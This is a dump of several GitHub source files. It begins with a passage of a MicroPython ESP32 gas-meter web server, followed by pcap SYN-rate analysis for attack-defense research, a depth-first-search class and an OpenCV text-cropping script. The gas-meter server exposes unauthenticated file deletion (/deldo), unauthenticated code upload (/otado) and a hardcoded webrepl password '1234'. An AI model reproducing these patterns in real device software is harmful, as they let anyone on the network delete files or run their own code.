)\n #\n html_in = \"\"\n # generate table\n # countsn_d.reverse()\n # for iii in list( reversed( range( len( countsn_d ) ) ) ): # reversed\n # show last 15 days, and not everything\n for iii in list(reversed(range(len(countsn_d) - 15, len(countsn_d)))): # reversed\n if iii < 0:\n continue\n # iiiv = round( countsn_d[iii] * vresolution, 2 )\n html_in = html_in + \"\" + \"-\".join(map(lambda aaa: '{:0>{w}}'.format(str(aaa), w=2), time.gmtime(VGLOB['offset_time'] + (iii * 3600 * 24))[0:3])) + \"\" + \"{:.2f}\".format(\n countsn_d[iii] * OFFSET['res']) + \"\" + \"{:.1f}\".format(countsn_d[iii] * OFFSET['res'] * OFFSET['energy']) + \"\\n\"\n #\n # generate rest of html\n html = \"\"\"\n\n\nGas meter\n\"\"\" + page_meta + \"\"\"\n\n\n\n

<b>Gas meter</b><br>\n<br>\n<b>System</b><br>\nVersion: \"\"\" + str(__version__) + \"\"\"<br>\nTotal count: \"\"\" + str((int((VGLOB['counter']) * 10)) / 10) + \"\"\" (\"\"\" + str(VGLOB['counter']) + \"\"\")<br>\nLast change: \"\"\" + str(VGLOB['update']) + \"\"\"<br>\nBoot: \"\"\" + str(VGLOB['boot']) + \"\"\"<br>\n<br>\n<b>Links:</b><br>\n<a href=\"/countsn_h\">Counts hourly</a><br>\n<a href=\"/countsn_d\">Counts daily</a><br>\n<a href=\"/info\">Info</a><br>\n<a href=\"/setting\">Setting</a><br>\n<a href=\"/ota\">Update OTA</a><br>\n<a href=\"/webrepl\">Add webrepl</a> - Webrepl console (pass: 1234)<br>\n<a href=\"/reset\">Reset</a><br>\n<b>Daily</b><br>\n<table>\n\"\"\" + html_in + \"\"\"\n<tr><td>Date ---------------</td><td>Value (m^3) ----</td><td>Value (kWh) ----</td></tr>\n</table>\n<b>Graph (hourly consumption)</b><br>
\n\n\n\"\"\"\n #\n html = html.encode('ascii')\n #print('= f generating page')\n #\n return( html )\n\n\n#-####\n#-####\n# -#### webpage loop function\n# -#### was based on socket, but now on async is more responsive and less consuming\n\nasync def loop_web(reader, writer) -> None:\n # waiting for input\n #recv = await reader.read(64)\n await asyncio.sleep(0.1)\n recv = yield from reader.read(64)\n #gc.collect()\n flood = 0\n #\n if gc.mem_free() < 10000:\n print('+ page flood 1')\n #GET / HTTP/1.1\n flood = 1\n #print(\"- f serving page\")\n #timer1 = time.ticks_ms()\n # 'GET / HTTP/1.\n #global ERRORLOG\n try:\n #recvtmp = recv.decode()\n if flood == 0:\n requesttype = recv.decode()[0:3]\n requestfull = recv.decode().split('\\r')[0].split(' ')[1].split('?')\n #requestfull = requestfull # [4:-6]\n #recv2 = await reader.read()\n #print( recv2.decode() )\n else:\n requestfull = ['/flood']\n except Exception as e:\n # if request invalid or malformed\n print('+ page request warn ', e)\n #ferror_log(\"f serving bad page - \" + str(requestfull) )\n requestfull = ['/']\n # continue\n # ?\n global VGLOB\n global VSCAN_LIST\n global countsn_d\n request = requestfull[0]\n #print(request, requestfull)\n requestval = ''\n vwebpage = b''\n resp = b''\n #timer2 = time.ticks_ms()\n #gc.collect()\n #print('= f serving page ', requestfull, \"||\", requestval, \"||\", request)\n #\n if len(requestfull) == 2:\n requestval = requestfull[1]\n #\n if request == \"/\":\n vwebpage = fwebpage()\n # Server-Timing: text;dur=\"\"\" + str(time.ticks_ms() - timer2) + \"\"\", req;dur=\"\"\" + str(timer2 - timer1) + \"\"\"\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: \"\"\" + str(len(vwebpage)) + \"\"\"\nConnection: close\n\"\"\"\n #conn.sendall(header + \"\\r\\n\" + vwebpage)\n await writer.awrite(header + \"\\r\\n\")\n # gc.collect()\n # INFO\n # await writer.awrite(vwebpage)\n #vwebpage = b''\n # continue\n #####\n #####\n elif request.split(\".\")[-1] == \"txt\" or request.split(\".\")[-1] == \"gz\":\n #\n await fsendfile(writer, request)\n #rrr = yield from fsendfile(writer, request)\n #\n #print('starting function fsendfile 2')\n ###\n elif request == \"/countsn_h\":\n await fsenddata(writer, countsn_h, 3600)\n #print('starting function fsenddata h 2')\n ###\n elif request == \"/countsn_d\":\n await fsenddata(writer, countsn_d, 3600 * 24)\n #print('starting function fsenddata d 2')\n ###\n elif request == \"/flood\":\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: 12\nConnection: close\n\"\"\"\n await writer.awrite(header + \"\\r\\n\" + \"flood, retry\" + \"\\r\\n\")\n # gc.collect()\n elif request == \"/deldo\":\n header = \"\"\"HTTP/1.1 302 Found\nContent-Length: 0\nLocation: /info\nConnection: close\n\"\"\"\n # Connection: close\n if requestval != '':\n try:\n os.remove(requestval)\n except Exception as e:\n # try to remove file, if fail no panic\n print('--- deldo file does not exist ', e)\n #pass\n # conn.sendall(header)\n await writer.awrite(header + \"\\r\\n\")\n # await writer.awrite(vwebpage)\n #####\n #####\n elif request == \"/setting\":\n #\n vwebpage = \"\"\"\"\"\" + page_meta + \"\"\"\nBACK
\n
\nCorrect counts by 1 count (= \"\"\" + str(OFFSET['res']) + \"\"\") (count now \"\"\" + str(VGLOB['counter']) + \"\"\"):<br>\n<form action=\"/settingdo\" method=\"post\">\n<input type=\"submit\" name=\"add_one\" value=\"add_one\">     <input type=\"submit\" name=\"remove_one\" value=\"remove_one\">\n</form>\n<br>\nSetting:<br>\n<br>\nCounting start date, for which the counter will be set:<br>\n<br>\nStarting value (always should end with 0.03):<br>\n<br>\nEnergy (in kWh per m^3 of gas):<br>\n<br>\nCounter resolution:<br>\n<br>
\n.\n\"\"\"\n # add zfill\n vwebpage = vwebpage.encode('ascii')\n #\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: \"\"\" + str(len(vwebpage)) + \"\"\"\nConnection: close\n\"\"\"\n #conn.sendall(header + \"\\r\\n\" + vwebpage)\n await writer.awrite(header + \"\\r\\n\")\n #\n elif request == \"/settingdo\":\n # ###\n #global countsn_h\n #print( recv.decode() )\n headerin = yield from reader.read(5000)\n # print(headerin)\n headerin = headerin.decode().split('\\r\\n\\r\\n')[-1].strip()\n headerin = str( \";\".join( headerin.strip().split('\\r\\n') ) )\n vwebpage = headerin.encode('ascii')\n #\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/plain\nContent-Length: \"\"\" + str(len(vwebpage)) + \"\"\"\nConnection: close\n\"\"\"\n #conn.sendall(header + \"\\r\\n\" + vwebpage)\n #await writer.awrite(header + \"\\r\\n\")\n #\n if headerin == \"add_one=add_one\":\n #print('adding')\n #fcb_btn()\n countsn_h[-1] += 1\n if headerin == \"remove_one=remove_one\":\n #print('removing')\n #fcb_btn()\n countsn_h[ [ nnn for nnn in range(-len(countsn_h), 0) if countsn_h[nnn] > 0 ][-1] ] -= 1\n if headerin[0:6] == \"OFFSET\":\n ### TODO\n for lll in headerin.split(\";\"):\n #print( lll )\n if lll[0:16] == 'OFFSET[\"value\"]=':\n try:\n OFFSET[\"value\"] = float( lll.split('=')[1] )\n frecount()\n except:\n pass\n print('setting values')\n ###\n if headerin == \"recalibrate\":\n ### TODO\n print('recalibrating')\n ### \n # recalculate values daily\n countsn_d = []\n for kkk in range(len(countsn_h)):\n if (kkk) >= (len(countsn_d) * 24):\n countsn_d.append(0)\n countsn_d[-1] += countsn_h[kkk]\n # recalculate counter\n frecount()\n #VGLOB['counter'] = OFFSET['value'] + (sum(countsn_h) * OFFSET['res'])\n #\n header = \"\"\"HTTP/1.1 302 Found\nContent-Length: 0\nLocation: /setting\nConnection: close\n\n\"\"\"\n await writer.awrite(header + \"\\r\\n\")\n # ###\n elif request == \"/info\":\n #\n if machine.reset_cause() == 0:\n reset_cause = \"PWRON_RESET\"\n elif machine.reset_cause() == 1:\n reset_cause = \"HARD_RESET\"\n elif machine.reset_cause() == 2:\n reset_cause = \"WDT_RESET\"\n elif machine.reset_cause() == 3:\n reset_cause = \"DEEPSLEEP_RESET\"\n elif machine.reset_cause() == 4:\n reset_cause = \"SOFT_RESET\"\n elif machine.reset_cause() == 5:\n reset_cause = \"BROWN_OUT_RESET\"\n else:\n reset_cause = \"unknown\"\n #\n # MQTT addresses IN:\\n\"\"\" + \"\\n\".join( [ str(aaa) for aaa in VMQTT_SUB_LIST ] ) + \"\"\"\n vwebpage = \"\"\"\"\"\" + page_meta + \"\"\"\nDirectory listing on ESP. By writing /deldo?filename, files can be removed (dangerous).
\nFiles ending in _old are safety copies made during OTA updates; they can be safely removed.
\nTo disable webrepl, delete webrepl_cfg.py and reboot the device.
\n
\nDir: \"\"\" + str(os.listdir()) + \"\"\"
\n
\nGlobal variables and settings:
\n\"\"\" + str(VGLOB) + \"\"\"
\n\"\"\" + str(OFFSET) + \"\"\"
\n
\nError log:\\n\"\"\" + \"\\n\".join( [ str(aaa) for aaa in ERRORLOG ] ) + \"\"\"
\n
\nReset cause: \"\"\" + str(reset_cause) + \"\"\"
\nMicroPython version: """ + str(os.uname()) + """
\nFree RAM: \"\"\" + str(gc.mem_free()) + \"\"\"
\n.\n\"\"\"\n #\n #vwebpage = vwebpage.encode('latin-1')\n vwebpage = vwebpage.encode('ascii')\n #\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: \"\"\" + str(len(vwebpage)) + \"\"\"\nConnection: close\n\"\"\"\n #conn.sendall(header + \"\\r\\n\" + vwebpage)\n await writer.awrite(header + \"\\r\\n\")\n # INFO\n # await writer.awrite(vwebpage)\n # conn.close()\n #####\n #####\n elif request == \"/webrepl\":\n #requestval = requestfull.split('\\r')[0].split(' ')[1].split('?')[1]\n #vwebpage = str(requestval) + \"\\n\" + str(os.listdir())\n try:\n fff = open('webrepl_cfg.py', 'w')\n await fff.write(\"PASS = \\'1234\\'\\n\")\n fff.close()\n except Exception as e:\n print('--- webrepl init issue ', e)\n # try to open file, if fail no panic\n #pass\n header = \"\"\"HTTP/1.1 302 Found\nContent-Length: 0\nLocation: /reset\nConnection: close\n\"\"\"\n #conn.sendall(header + \"\\r\\n\" + vwebpage)\n await writer.awrite(header + \"\\r\\n\")\n # await writer.awrite(vwebpage)\n # machine.reset()\n #####\n #####\n elif request == \"/ota\":\n # postpone job, to speed up ota\n #fpostpone()\n #ble.gap_scan( 0 )\n # method=\"post\"\n vwebpage = \"\"\"\"\"\" + page_meta + \"\"\"\nUsually upload main.py file. Sometimes boot.py file. Binary files do not work yet.\n
\n
\n\n\n
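\nNote (added): after a successful upload, the previous file is renamed with an _old suffix as a safety copy (see the /otado handler below).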
\n.\n\"\"\"\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: \"\"\" + str(len(vwebpage)) + \"\"\"\nConnection: close\n\"\"\"\n #conn.sendall(header + \"\\r\\n\" + vwebpage)\n await writer.awrite(header + \"\\r\\n\")\n # INFO\n # await writer.awrite(vwebpage)\n #####\n #####\n elif request == \"/otado\":\n # postpone job, to speed up ota\n #fpostpone()\n # stop scan if any\n #fstopscan()\n #\n vwebpage = ''\n #VGLOB = ''\n VSCAN_LIST = {}\n #gc.collect()\n # s.setblocking(0)\n header = \"\"\"HTTP/1.1 302 Found\nContent-Length: 0\nLocation: /reset\nConnection: close\n\n\"\"\"\n # =\n #ble.active(False)\n #gc.collect()\n #headerin = conn.recv(500).decode()\n headerin = yield from reader.read(500)\n # print(headerin)\n headerin = headerin.decode()\n boundaryin = headerin.split(\"boundary=\", 2)[1].split('\\r\\n')[0]\n lenin = int(headerin.split(\"\\r\\nContent-Length: \", 2)[1].split('\\r\\n')[0])\n # dividing into 2000 bytes pieces\n bufflen = round(lenin / float(str(round(lenin / 2000)) + \".5\"))\n #lenin = 0\n # print(\"===\")\n #print( headerin )\n #print( \"===\" )\n begin = 0\n try:\n os.remove('upload')\n except Exception as e:\n # try to upload file, if fail no panic\n print('+ otado cleaning fail 1, this is fine', e)\n #pass\n fff = open('upload', 'wb')\n while True:\n #dataaa = conn.recv(bufflen).decode().split('\\r\\n--' + boundaryin, 2)\n dataaa = yield from reader.read(bufflen)\n dataaa = dataaa.decode().split('\\r\\n--' + boundaryin, 2)\n splita = len(dataaa)\n #print( splita )\n #filein += dataaa\n if begin == 0 and splita == 3:\n #print( \"= short\" )\n # short\n # conn.sendall(header)\n # conn.close()\n await writer.awrite(header + \"\\r\\n\")\n namein = dataaa[1].split(' filename=\"', 1)[1].split('\"\\r\\n', 1)[0]\n fff.write(dataaa[1].split('\\r\\n\\r\\n', 1)[1])\n # done with success\n begin = 3\n break\n if begin == 0 and splita == 2:\n #print( \"= first\" )\n # first\n namein = dataaa[1].split(' filename=\"', 1)[1].split('\"\\r\\n', 1)[0]\n fff.write(dataaa[1].split('\\r\\n\\r\\n', 1)[1])\n begin = 1\n elif begin == 1 and splita == 1:\n #print( \"= middle\" )\n # middle\n fff.write(dataaa[0])\n elif begin == 1 and splita == 2:\n #print( \"= last\" )\n # last\n # conn.sendall(header)\n await writer.awrite(header + \"\\r\\n\")\n # conn.close()\n fff.write(dataaa[0])\n # done with success\n begin = 3\n break\n fff.close()\n # now replace new file\n if begin == 3:\n try:\n os.remove(namein + \"_old\")\n except Exception as e:\n print('+ otado cleaning fail 2, this is fine', e)\n #pass\n try:\n os.rename(namein, namein + \"_old\")\n except Exception as e:\n print('+ otado cleaning fail 3, this is fine', e)\n os.rename('upload', namein)\n #print( \"===\" )\n #print( namein )\n #print( lenin )\n dataaa = ''\n #ble.active(True)\n #gc.collect()\n #####\n #####\n elif request == \"/reset\":\n #fpostpone()\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: 34\nConnection: close\n\nDo reset ?\n\"\"\"\n # Connection: close\n # conn.sendall(header)\n await writer.awrite(header + \"\\r\\n\")\n # await writer.awrite(vwebpage)\n # conn.close()\n # time.sleep(2) # no sleep here ;)\n #####\n #####\n elif request == \"/resetdo\":\n header = \"\"\"HTTP/1.1 302 Found\nContent-Length: 0\nLocation: /\nConnection: close\n\n\"\"\"\n # Connection: close\n # conn.sendall(header)\n await writer.awrite(header + \"\\r\\n\")\n # await writer.awrite(vwebpage)\n # conn.close()\n # time.sleep(2) # no sleep here ;)\n await asyncio.sleep(0.2) # was 0.3, 0.1 
was not good\n #machine.reset()\n freset()\n # time.sleep(1)\n #####\n #####\n else:\n # Server-Timing: text;dur=\"\"\" + str(time.ticks_ms() - timer2) + \"\"\", req;dur=\"\"\" + str(timer2 - timer1) + \"\"\"\n header = \"\"\"HTTP/1.0 404 Not Found\nContent-Type: text/plain\nContent-Length: 23\nConnection: close\n\n404 No page like this.\n\"\"\"\n # conn.sendall(header)\n await writer.awrite(header + \"\\r\\n\")\n # await writer.awrite(vwebpage)\n # conn.close()\n # END IF\n # conn.close() # close or not ?\n # whatever\n try:\n await writer.awrite(vwebpage)\n await writer.drain()\n except Exception as e:\n print('- page flood 2', e)\n # drain and sleep needed for good transfer\n vwebpage = b''\n resp = b''\n # was 0.2, 0.1 is not good\n await asyncio.sleep(0.2)\n # waiting until everything is sent, to close\n await reader.wait_closed()\n # await reader.aclose()\n gc.collect()\n #print(\"-- f serving page done\")\n try:\n # if run as thread, then stop thread\n if not CONFIG2['loop']:\n _thread.exit()\n return\n #pass\n except Exception as e:\n # if this fails, there is no reason to panic, function not in thread\n #ferror_log(\"loop_web thread closed\")\n print('- loop_web close thread:', e)\n # break\n # catch OSError: [Errno 104] ECONNRESET ?\n\n#-###\n#-###\n#-###\n\ndef loop_ntp() -> None:\n global vwebpage\n while CONFIG2['loop']:\n try:\n # get ntp\n ntptime.settime()\n # generate page every loop\n #vwebpage = fwebpage()\n except:\n pass\n # time.sleep(60*60*4) # 4 hours\n #time.sleep(60 * 60) # 1 hours\n\ndef fstart_server() -> None:\n async_loop = asyncio.get_event_loop()\n vserver = asyncio.start_server(loop_web, \"0.0.0.0\", 80)\n async_loop.create_task(vserver)\n async_loop.run_forever()\n return\n\n#-###\n#-### END OF DEFINITIONS\n#-### REAL CODE HERE\n\n#-### define global variables\ntime.sleep(0.2)\ntry:\n ntptime.settime()\nexcept:\n pass\ntime.sleep(0.2)\n\n#VGLOB = {} # defined earlier\n# define time here\n# calculate time offset from the measurement start, should be at midnight\n#VGLOB['offset_time'] = int(time.mktime(OFFSET['date']))\nVGLOB['offset_time'] = int(time.mktime(OFFSET['date']))\n#print(OFFSET['time'])\n# boot time, this stays\nVGLOB['boot'] = now()\n# last update timer, this will change with every update\nVGLOB['update'] = now()\n\n# -### begin, defining inputs and creating/loading files\n# -### readout input value now and define global variable\n#inpvv = inps[21].value()\n# -### creating tables\n# hourly count\ncountsn_h = bytearray()\n# daily count, could be bytearray, but consumption might be higher than 256 daily\ncountsn_d = []\n# just float, showing current counter state\n#countsn = OFFSET['value']\nVGLOB['counter'] = OFFSET['value']\n# possible to add monthly/yearly consumption\n# start settings\n\nERRORLOG = []\n#-### preparation after clean boot\n\n#-###\n#-###\n#-### reading data\ntry:\n VGLOB['temp'] = ( OFFSET['extremes'][1] + OFFSET['extremes'][0] ) / 2\n #VGLOB['extremes'] = OFFSET['extremes']\n if fread_single() > VGLOB['temp']:\n VGLOB['limit'] = [ 1 , OFFSET['extremes'][1] ]\n else:\n VGLOB['limit'] = [ 0 , OFFSET['extremes'][0] ] \nexcept:\n VGLOB['temp'] = fread_single()\n OFFSET['extremes'] = [ VGLOB['temp']-10, VGLOB['temp']+10 ]\n VGLOB['limit'] = [ 0 , fread_single() ]\n#\n\ntime.sleep(0.2)\ntry:\n # try to load\n aa = open('countsn_h.bin', 'rb')\n countsn_h = bytearray(aa.read())\n aa.close()\n # recalculate temporary tables\n # daily\n diffd = int(int(time.time() - VGLOB['offset_time']) / (24 * 3600)) + 1\n # recalculate daily 
consumption\n # presumes offset at midnight\n countsn_d = []\n for kkk in range(len(countsn_h)):\n if (kkk) >= (len(countsn_d) * 24):\n countsn_d.append(0)\n countsn_d[-1] += countsn_h[kkk]\n # recalculate counter\n frecount()\n #VGLOB['counter'] = OFFSET['value'] + (sum(countsn_h) * OFFSET['res'])\n # monthly/weekly ?\n print('+++ load succesful')\n del aa\n del kkk\nexcept Exception as e:\n # if new start, create file\n countsn_h = bytearray([0])\n countsn_d = [0] # maybe will be created automatically...\n #\n #fsave_count()\n #\n print('except: ', e)\n print('--- new file created')\n#gc.collect()\ntime.sleep(0.2)\n\n#-###\n#-###\n#-### mqtt callback\n# placeholder for mqtt functionality\n# probably unidirectional\n# mqtts.set_callback( cb_mqtt )\n# mqtts.connect()\n# mqtts.subscribe( \"/aaaa/aaaa\" )\n\n#-###\n#-###\n#-### input interrupts\n#inps[21].irq(trigger=Pin.IRQ_RISING | Pin.IRQ_FALLING, handler=fcb_btn)\n# inps[22].irq( trigger=Pin.IRQ_RISING | Pin.IRQ_FALLING, handler=cb_btn )\n# inps[23].irq( trigger=Pin.IRQ_RISING | Pin.IRQ_FALLING, handler=cb_btn )\n#-###\n# was 2, is 1.5, one full rotation can take as short as 10 seconds\n# v17_01 - 3 sec should be good enough\ntimer_check.init( period = round( 3 * 1000 ), callback=finput_read)\n#\ntime.sleep(0.2)\n#\n#-###\n#-###\n#-### starting threads\n#loopwebthread = _thread.start_new_thread(loop_web, ())\n#loopntpthread = _thread.start_new_thread(loop_ntp, ())\n#\n_thread.start_new_thread(fstart_server, ())\n#\n#time.sleep(0.2)\n#\n\n#fcb_btn()\n#time.sleep(1)\n\n#wdt = machine.WDT( timeout = int( VGLOB['delaycheck'] * 3 ) * 1000 )\n\ngc.collect()\n\n#-### end\n","repo_name":"yunnanpl/esp32_python_gasmeter","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":33474,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"98"} +{"seq_id":"31939378713","text":"#!/usr/bin/env python\nimport logging\nimport dpkt\nimport time\nimport operator\nimport numpy as np\nfrom utils.utils import logger_set_log_level\nfrom connection import fill_connections\n\n# keep a logger for debugging and info\nlogger = logging.getLogger(__name__)\n\n\ndef compute_all_rates(pcap_file, interval_s, target_ips, verbose=0, timing=None):\n \"\"\"\n Compute all of the rates for all the attack nodes received over time by\n the server.\n\n @pcap_file: The name of the pcap files containing all packets\n @interval_s: The sampling interval\n @target_ips: The ip addresses of the attack nodes\n @verbose: verbosity level, 0 for all off, 1 for statistics, 2 for everything\n @timing: a dictionary generated by fill_connections prior to calling this routine.\n If it is None, the dictionary is generated locally.\n\n @returns two dictionaries, one for the number of SYN packets sent\n and another containing the number of connections established.\n\n \"\"\"\n\n # check what level of warnings we should use\n current_log_level = logger.getEffectiveLevel()\n if verbose: logger_set_log_level(logger, logging.DEBUG)\n\n if timing is None:\n start_time = time.time()\n f = open(pcap_file)\n rcap = dpkt.pcap.Reader(f)\n timing = fill_connections(rcap, verbose == 2, target_ips)\n end_time = time.time()\n\n logger.debug(\"Time to read pcap file \" + str(end_time - start_time))\n\n start_time = time.time()\n syn_rates = {}\n connection_rates = {}\n\n for host, conn_dict in timing.items():\n num_attempted = 0\n num_acked = 0\n num_failed = 0\n num_synacked = 0\n\n # will have to handle things in two different loops because of 
the difference in\n # timestamps between the sending of the SYN and the ACK packets\n sending_rate = np.array([0])\n sorted_items = sorted(conn_dict.values(), key=operator.attrgetter('syn_sent'))\n start_ts = 0\n curr_bucket = 0\n for conn in sorted_items:\n syn_sent = conn.syn_sent\n\n if syn_sent == 0:\n continue\n\n # ack has been sent, check which bucket we're counting\n if start_ts == 0:\n start_ts = syn_sent\n\n if (syn_sent - start_ts) > interval_s:\n skipped = int((syn_sent - start_ts)) / interval_s\n if skipped > 1:\n filling = [0] * (skipped - 1)\n sending_rate = np.append(sending_rate, filling)\n curr_bucket += skipped - 1\n\n sending_rate = np.append(sending_rate, 1)\n curr_bucket += 1\n\n start_ts = start_ts + skipped * interval_s\n assert (syn_sent - start_ts < interval_s)\n else:\n sending_rate[curr_bucket] += 1\n\n num_attempted += (1 + np.size(conn.syn_retransmissions))\n\n # now will have to do the establishment rate but do the sorting based on the ack_sent\n # numbers (Actually from the server's end, it should be the ack_received)\n establishment_rate = np.array([0])\n sorted_items = sorted(conn_dict.values(), key=operator.attrgetter('ack_sent'))\n start_ts = 0\n curr_bucket = 0\n for conn in sorted_items:\n ack_sent = conn.ack_sent\n synack_received = conn.synack_received\n\n # check for the ack packets going for the FIN packets\n if conn.syn_sent == 0:\n # this is an FIN packet or an application packet\n continue\n\n # check if the syn ack has been received\n if synack_received > 0:\n num_synacked += 1\n\n # check if the ack has been sent\n if conn.syn_sent > 0 and ack_sent == 0:\n num_failed += 1\n continue\n\n # check if the server dropped this connection\n if conn.IsDroppedByServer():\n num_failed += 1\n\n # count this as a completed connection, it is tricky though that\n # we do not know for sure what happened here, did it reach the\n # established state or did it have to timeout?\n num_acked += 1\n\n # ack has been sent, check which bucket we're counting\n if start_ts == 0:\n start_ts = ack_sent\n\n if (ack_sent - start_ts) > interval_s:\n skipped = int((ack_sent - start_ts)) / interval_s\n if skipped > 1:\n filling = [0] * (skipped - 1)\n establishment_rate = np.append(establishment_rate, filling)\n curr_bucket += skipped - 1\n\n establishment_rate = np.append(establishment_rate, 1)\n curr_bucket += 1\n\n start_ts = start_ts + skipped * interval_s\n assert (ack_sent - start_ts < interval_s)\n else:\n establishment_rate[curr_bucket] += 1\n\n syn_rates[host] = sending_rate\n connection_rates[host] = establishment_rate\n\n attacker_stat_log = \"\"\"\n {:38}\\t{}\n {:38}\\t{}\n {:38}\\t{}\n {:38}\\t{}\n {:38}\\t{}\n {:38}\\t{}\n {:38}\\t{}\"\"\".format('Statistics for host:', host,\n 'Total number of attempted connections:', num_attempted,\n 'Total number of acked connections:', num_acked,\n 'Total number of failed connections:', num_failed,\n 'Total number of replies received:', num_synacked,\n 'Average SYN rate seen by server:', np.average(sending_rate) / interval_s,\n 'Average ACK rate seen by server:', np.average(establishment_rate) / interval_s)\n\n # debug because we don't want to do this for every possible ip address\n logger.debug(\"+\" + '-'*50 + \"+\" + attacker_stat_log)\n logger.debug(\"+\" + '-'*50 + \"+\")\n\n end_time = time.time()\n logger.debug(\"Time to perform full analysis \" + str(end_time - start_time))\n\n # reset the logger config\n logger_set_log_level(logger, current_log_level)\n\n return syn_rates, 
connection_rates\n","repo_name":"nouredd2/puzzles-utils","sub_path":"analysis/parsing/server_analysis.py","file_name":"server_analysis.py","file_ext":"py","file_size_in_byte":6210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"19959880685","text":"class DepthFirstSearch:\n def __init__(self):\n self.graph = {} # Initialize an empty graph\n\n def add_edge(self, source, destination):\n # Add an edge from source to destination\n if source in self.graph:\n self.graph[source].append(destination)\n else:\n self.graph[source] = [destination]\n\n def dfs(self, start_node):\n visited = [] # List to keep track of visited nodes\n stack = [start_node] # Initialize a stack with the start node\n\n while stack:\n node = stack.pop() # Pop the last node from the stack\n if node not in visited:\n visited.append(node) # Mark the node as visited\n\n # Push unvisited neighbors onto the stack\n if node in self.graph:\n for neighbor in self.graph[node]:\n if neighbor not in visited:\n stack.append(neighbor)\n\n return visited\n","repo_name":"tguttzeit/AI-Code-Examination","sub_path":"py_app/src/ChatGPT/DepthFirstSearch/T25/depth_first_search.py","file_name":"depth_first_search.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"36508050524","text":"import cv2, numpy as np\nimport sys\nimport time\n\n\ndef apply_brightness_contrast(input_img, brightness, contrast):\n\n if brightness != 0:\n if brightness > 0:\n shadow = brightness\n highlight = 255 + brightness\n else:\n shadow = 0\n highlight = 255 + brightness\n alpha_b = (highlight - shadow)/255\n gamma_b = shadow\n\n buf = cv2.addWeighted(input_img, alpha_b, input_img, 0, gamma_b)\n else:\n buf = input_img.copy()\n\n if contrast != 0:\n f = 131*(contrast + 127)/(127*(131-contrast))\n alpha_c = f\n gamma_c = 127*(1-f)\n\n buf = cv2.addWeighted(buf, alpha_c, buf, 0, gamma_c)\n\n return buf\n\ndef WordExtract(orig, dilate, count):\n mult = 1.1 # I wanted to show an area slightly larger than my min rectangle set this to one if you don't\n img_box = orig.copy()\n\n cnts = cv2.findContours(dilate, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if len(cnts) == 2 else cnts[1]\n\n croppedImages = []\n\n for cnt in cnts:\n area = cv2.contourArea(cnt)\n if area > 60000:\n rect = cv2.minAreaRect(cnt)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n\n W = rect[1][0]\n H = rect[1][1]\n\n Xs = [i[0] for i in box]\n Ys = [i[1] for i in box]\n x1 = min(Xs)\n x2 = max(Xs)\n y1 = min(Ys)\n y2 = max(Ys)\n\n rotated = False\n angle = (rect[2])\n if angle > 90:\n angle = angle + (90-angle)\n rotated = True\n else:\n angle = angle + (0-angle)\n\n if rotated:\n W, H = H, W\n\n center = (int((x1+x2)/2), int((y1+y2)/2))\n size = (int(mult*(x2-x1)),int(mult*(y2-y1)))\n\n M = cv2.getRotationMatrix2D((size[0]/2, size[1]/2), angle, 1.0)\n\n cropped = cv2.getRectSubPix(img_box, size, center)\n cropped = cv2.warpAffine(cropped, M, size)\n\n croppedRotated = cv2.getRectSubPix(cropped, (int(H*mult), int(W*mult)), (size[0]/2, size[1]/2))\n\n cv2.imwrite(f'./output/{str(count)}.png', croppedRotated)\n print(f\"Writing \\t :: \\t'./output/{str(count)}.png'\")\n croppedImages.append(f'./output/{str(count)}.png')\n\n count = count+1\n\n return croppedImages, count\n\n\n\ndef main(path, i):\n print(path)\n # read image\n orig = cv2.imread(path)\n\n # grey scaling\n grey_img = cv2.cvtColor(orig, cv2.COLOR_BGR2GRAY)\n\n 
# contrasting\n b=50 #brightness_const\n c=120 #contrast_const\n contrast = apply_brightness_contrast(grey_img, b, c)\n\n # global thresholding\n ret, global_thresh = cv2.threshold(contrast, 50, 255, cv2.THRESH_BINARY)\n\n # adaptive thresholding\n adapt_thresh = cv2.adaptiveThreshold(global_thresh, 250, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 11, 2)\n\n # denoishing\n denoised = cv2.fastNlMeansDenoising(adapt_thresh, 11, 31, 5) #11, 45, 9 #11, 31, 9 #30,7,25\n\n # Dilate to combine adjacent text contours\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))\n dilate = cv2.dilate(denoised, kernel, iterations=5)\n\n dilated_blur = cv2.GaussianBlur(dilate, (21, 21), 10)\n\n ret, dilated_thresh = cv2.threshold(dilated_blur, 50, 255, cv2.THRESH_BINARY)\n\n dilated_adapted = cv2.adaptiveThreshold(dilated_thresh, 250, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 11, 2)\n\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (7, 3))\n dilatedfinal = cv2.dilate(dilated_adapted, kernel, iterations=10)\n # cv2.imshow(\"dilatedfinal\", cv2.resize(dilatedfinal, (1000, 1000)))\n\n output, i = WordExtract(orig, dilatedfinal, i)\n\n cnts = cv2.findContours(dilatedfinal, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if len(cnts) == 2 else cnts[1]\n\n\n for cnt in cnts:\n area = cv2.contourArea(cnt)\n if area > 50000:\n x, y, w, h = cv2.boundingRect(cnt)\n rect = cv2.minAreaRect(cnt)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n orig = cv2.drawContours(orig,[box],0,(0,0,255), 10)\n cv2.rectangle(orig, (x, y),(x + w, y + h), (36, 255, 12), 10)\n\n # cv2.imshow(\"Testing red\", cv2.resize(checking, (1000, 1000)))\n # 